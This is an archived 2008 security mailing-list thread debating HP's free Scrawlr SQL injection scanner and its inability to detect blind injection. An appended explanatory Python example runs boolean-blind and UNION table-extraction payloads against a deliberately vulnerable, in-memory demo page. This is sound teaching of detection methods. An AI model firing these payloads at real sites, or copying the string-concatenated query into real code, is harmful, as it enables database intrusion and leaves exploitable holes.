
Re: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler



Billy, as I said, I tested it on a blind SQL injection; that's why it didn't get caught. If you still want the logs just ask, but I'm sure they're useless since bsqli is just not supported atm. I was just pointing out that while the bot could have been successful at exploiting that (blind) injection, the same cannot be said for the tool. (I'm still talking about an injection through the GET method.)
Blind sqli is not so uncommon. Many websites (and hosting companies for their customers) use a user-friendly page for internal server errors or just play security by obscurity.
I'm sure with not so much effort you can add this feature.


----
Zinho

Webmaster and Founder

Hackers Center
Internet Security Portal
www.hackerscenter.com



Hoffman, Billy wrote:
Can you give us some more info on your testing problems? Can we get access to the troublesome pages? I hear you on the "if you're going to make a splash make it a good one" point and I agree with you. I truly want to improve this with additional features and bug fixes. There is only so much I can do now that SPI is part of a corporate machine...

Please let me know if we can access the pages or send us the files themselves and we will test them in house. At the very least can you send us a proxy log of the tool crawling/attacking the pages?

Thanks,

Billy Hoffman
--
Manager, HP Web Security Research Group
HP Software - Application Security Center
Direct:  770-343-7069


-----Original Message-----
From: Zinho [mailto:zinho@xxxxxxxxxxxxxxxxx]
Sent: Wednesday, June 25, 2008 3:38 AM
To: Hoffman, Billy; websecurity@xxxxxxxxxxxxx
Subject: Re: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

Billy and Rafal,
I do really appreciate that Microsoft cared for a security threat that
didn't even come from a vulnerability in their software but from poor
coding using their legacy (poor?) script languages.
And I got that this wasn't a penetration testing tool.
My point was, if it doesn't crawl all the links in a page (from the tool
GUI I read "is limited in the number of links it will crawl"), and is
not able to recognize a blind sqli, isn't this effort at least half-wasted?
AFAIK, the attack tool just tried to inject the payload in a dynamic
parameter of the querystring found through Google.
So it would have been successful against a bsqli while the tool is not.
The effort is interesting, but some basic improvements would have made
it more useful for future vectors too.

And Rafal, I tested the tool pointing it to an .htm page where there's a
link to the vulnerable asp page with the vulnerable querystring.

----
Zinho

Webmaster and Founder

Hackers Center
Internet Security Portal
www.hackerscenter.com



Hoffman, Billy wrote:
Michael, Zinho,

I'm not sure why people seem to think Scrawlr is a replacement for existing tools like Absinthe or Nikto or Burp, etc. It's not, and I'm sorry if you got that impression.

Scrawlr exists for one reason: Some crazy hackers who read Chinese built this:
http://isc.sans.org/diary.html?storyid=4294

Microsoft came to us for that specific need: to help them provide developers with tools to prevent these mass exploits. Because the attack tool leverages search engines to find target pages, Scrawlr crawls and behaves like an indexing spider. It then SQL injects all query parameters exactly like the attack tool. We then extract all the user tables (be it Oracle, MSSQL, MySQL >=5, etc.) to confirm SQL injection before flagging it. I'm very happy with our results.

Is the tool going to find issues behind auth or forms or other web components? No, but neither will the attackers using this mass exploit tool. Can they change tactics and use, for example, Nikto or Burp? Sure.

Could we have released Scrawlr as more of a WI Lite? Yes, but that was never its intent. And if you need something that's more robust by all means grab a free trial of WI or another vendor, or Burp, or Nikto or script some w3af.

Zinho, if you are finding bugs I'd love to learn more about them and get them fixed. Scrawlr supports proxies so that will help you see what is going on. Did the vuln page get crawled?

At the end of the day it's a free tool folks designed to solve a certain issue. I'm certainly open to more feedback but let's keep its original goals in perspective.

Thanks,
Billy Hoffman
--
Manager, HP Web Security Research Group
HP Software - Application Security Center
Direct:  770-343-7069


-----Original Message-----
From: Zinho [mailto:zinho@xxxxxxxxxxxxxxxxx]
Sent: Tuesday, June 24, 2008 8:04 PM
To: websecurity@xxxxxxxxxxxxx
Subject: Re: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

I have to agree with Michael. I tested it on both simple ASP and PHP
pages with a clear SQL injection. Nothing. The tool doesn't even seem to
check for blind sqli.
I think it merely gets the server's response and looks for known SQL
errors. Not to mention the limited crawling capabilities.
I would have expected something more from HP/MS. Free tools around do a
much better job.

http://www.hackerscenter.com/index.php?/Blogs/2819-HP-and-MS-give-us-a-new-SQL-Injection-tool.html


---- Armando Romeo

Webmaster and Founder

Hackers Center
Internet Security Portal
www.hackerscenter.com



Michael S. Menefee wrote:

Billy,

Although this is indeed a good step, there are already a plethora of
"free" sql injection scanners or exploiters that kick the crap out of
this tool.

However, I am extremely excited to see this kind of development in the
commercial space, and would like to see some enhancements to this
product. Now, if HPs goal is to push their commercial tools ($$$) by
pushing a limited "free" version, then I suppose none of this will ever
happen, but *at a minimum* it would be nice to be able to either modify
headers or input credentials where public sites are not the target.

I tested this on 3 sites I knew to be vulnerable to SQL injection (all
ASP.NET, MSSQL), but either cookies or authentication were required to
actually test in these cases, hence nothing was discovered with this
tool (lame).

There's nothing worse than a free version of a product designed
exclusively for you to be left "wanting" and thinking about purchasing
the commercial version.

If there are unseen or hidden options to this tool, forgive me,
otherwise I don't really see the value when so many better free tools
exist (Pangolin, Absinthe, Magic, Power Injector, etc, etc, etc)








-----Original Message-----
From: Hoffman, Billy [mailto:billy.hoffman@xxxxxx]
Sent: Tuesday, June 24, 2008 5:35 PM
To: websecurity@xxxxxxxxxxxxx
Subject: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

In response to all the Mass SQL Injection attacks this year, Microsoft
approached HP and the Web Security Research Group (formerly SPI Labs)
for assistance. While there was nothing they could patch, Microsoft
wanted to provide tools to help developers find and fix these issues.
After a month of development HP created Scrawlr.

Scrawlr (short for SQL Injector and Crawler) is a free tool that will
crawl a website while simultaneously analyzing the parameters of each
individual web page for SQL Injection vulnerabilities. Scrawlr was
designed specifically to help protect against these mass injection
attacks, which use Google queries to find older web applications and
automatically inject them. As such, Scrawlr crawls a website using
the same techniques as a search engine: it doesn't keep state, or submit
forms, or execute JavaScript or Flash. Thus Scrawlr finds and
audits the pages that would have been indexed by the search engines.

To reduce false positives Scrawlr provides proof of the vulnerability
results by displaying the type of backend database in use and a list of
available table names. There is no denying you have SQL Injection when I
can show you table names!

Microsoft Announcement here:
http://www.microsoft.com/technet/security/advisory/954462.mspx
HP WSRG Blog:
http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/23/finding-sql-injection-with-scrawlr.aspx
Download here: https://download.spidynamics.com/Products/scrawlr/

Enjoy,
Billy Hoffman
--
Manager, HP Web Security Research Group
HP Software - Application Security Center
Direct:  770-343-7069
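The two detection strategies argued over in this thread can be seen side by side in a small offline model. The following is an added example written for this page; it is not Scrawlr's code, nor the code of the attack tool from the SANS diary. The target (an in-memory SQLite database, two made-up tables, a static .htm page linking to a deliberately vulnerable product.asp page) is entirely constructed, the error-signature list is an assumed, abbreviated one, and the table-name extraction uses SQLite's sqlite_master catalog, so the UNION payload would need to change for MSSQL, MySQL or Oracle. The crawler follows only <a href> links and keeps no state, the way the announcement describes Scrawlr working, and it takes a link limit like the one Zinho quotes from the GUI. The point it demonstrates: with a friendly error page, a signature check on the response (error_based) sees nothing, while the boolean differential check (boolean_blind) and the table-extraction proof (confirm_tables) still find and confirm the same injection.

```python
import re
import sqlite3
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlencode, urljoin, urlparse, urlunparse

# Constructed target: an in-memory SQLite database stands in for the site's backend.
_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
    CREATE TABLE users(id INTEGER PRIMARY KEY, login TEXT);
    INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
    INSERT INTO users VALUES (1, 'admin');
""")

def vulnerable_product_page(pid, verbose_errors):
    """Deliberately vulnerable: the id parameter is concatenated straight into the SQL."""
    sql = "SELECT name FROM products WHERE id=" + pid
    try:
        rows = _db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Verbose: classic error page. Otherwise a friendly page hides the error (blind case).
        if verbose_errors:
            return f"<html><body>DB error: {exc}</body></html>"
        return "<html><body>Sorry, something went wrong.</body></html>"
    items = "".join(f"<li>{name}</li>" for (name,) in rows)
    return f"<html><body><ul>{items}</ul></body></html>"

# Constructed static pages: the .htm page links to the vulnerable .asp page.
STATIC = {
    "http://example.test/": '<html><a href="/product.asp?id=1">w</a><a href="/about.htm">a</a></html>',
    "http://example.test/about.htm": '<html><a href="/product.asp?id=2">g</a></html>',
}

def fetch(url, verbose_errors=False):
    """Stateless GET, like an indexing spider: no cookies, no forms, no JavaScript."""
    parts = urlparse(url)
    if parts.path == "/product.asp":
        params = dict(parse_qsl(parts.query, keep_blank_values=True))
        return vulnerable_product_page(params.get("id", ""), verbose_errors)
    return STATIC.get(url, "<html>404</html>")

class LinkParser(HTMLParser):
    """Collects <a href> values; nothing else on the page is followed."""
    def __init__(self):
        super().__init__()
        self.links = []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.links.extend(v for k, v in attrs if k == "href" and v)

def crawl(start, fetch_fn, limit=50):
    """Breadth-first crawl, capped at `limit` pages, collecting every URL with a query string."""
    seen, queue, targets = set(), [start], []
    while queue and len(seen) < limit:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        html = fetch_fn(url)
        if urlparse(url).query:
            targets.append(url)
        parser = LinkParser()
        parser.feed(html)
        queue.extend(urljoin(url, href) for href in parser.links)
    return targets

# Assumed, abbreviated signature list; a real scanner carries many more per DBMS.
SQL_ERROR_RE = re.compile(r"DB error|unrecognized token|You have an error in your SQL syntax|"
                          r"Microsoft OLE DB Provider|ORA-\d{5}", re.I)

def with_param(url, name, value):
    parts = urlparse(url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True), **{name: value})
    return urlunparse(parts._replace(query=urlencode(query)))

def error_based(url, param, fetch_fn):
    """Signature check: fires only if the server leaks a database error message."""
    return bool(SQL_ERROR_RE.search(fetch_fn(with_param(url, param, "'"))))

def boolean_blind(url, param, fetch_fn):
    """Differential check: a true condition must reproduce the baseline, a false one must not."""
    original = dict(parse_qsl(urlparse(url).query))[param]
    baseline = fetch_fn(url)
    true_page = fetch_fn(with_param(url, param, f"{original} AND 1=1"))
    false_page = fetch_fn(with_param(url, param, f"{original} AND 1=2"))
    return true_page == baseline and true_page != false_page

def confirm_tables(url, param, fetch_fn):
    """Proof in the Scrawlr sense: UNION the catalog's table names into the page (SQLite catalog assumed)."""
    payload = "-1 UNION SELECT name FROM sqlite_master WHERE type='table'"
    html = fetch_fn(with_param(url, param, payload))
    return sorted(re.findall(r"<li>([^<]+)</li>", html))

def scan(start, fetch_fn):
    findings = {}
    for url in crawl(start, fetch_fn):
        for name, _ in parse_qsl(urlparse(url).query, keep_blank_values=True):
            findings[(url, name)] = {
                "error_based": error_based(url, name, fetch_fn),
                "boolean_blind": boolean_blind(url, name, fetch_fn),
                "tables": confirm_tables(url, name, fetch_fn),
            }
    return findings
```

Running `scan("http://example.test/", fetch)` models the friendly-error site: error_based is False for both parameters, boolean_blind is True, and confirm_tables returns the two table names. Passing `lambda u: fetch(u, verbose_errors=True)` instead models a site that leaks its error messages, and only then does the signature check fire. Note that the differential check compares whole responses, so on a real site with per-request noise (timestamps, session tokens, rotating banners) it needs the same page-similarity handling any blind scanner has, and the UNION proof only works when the number of selected columns lines up with the original query.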


----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA


















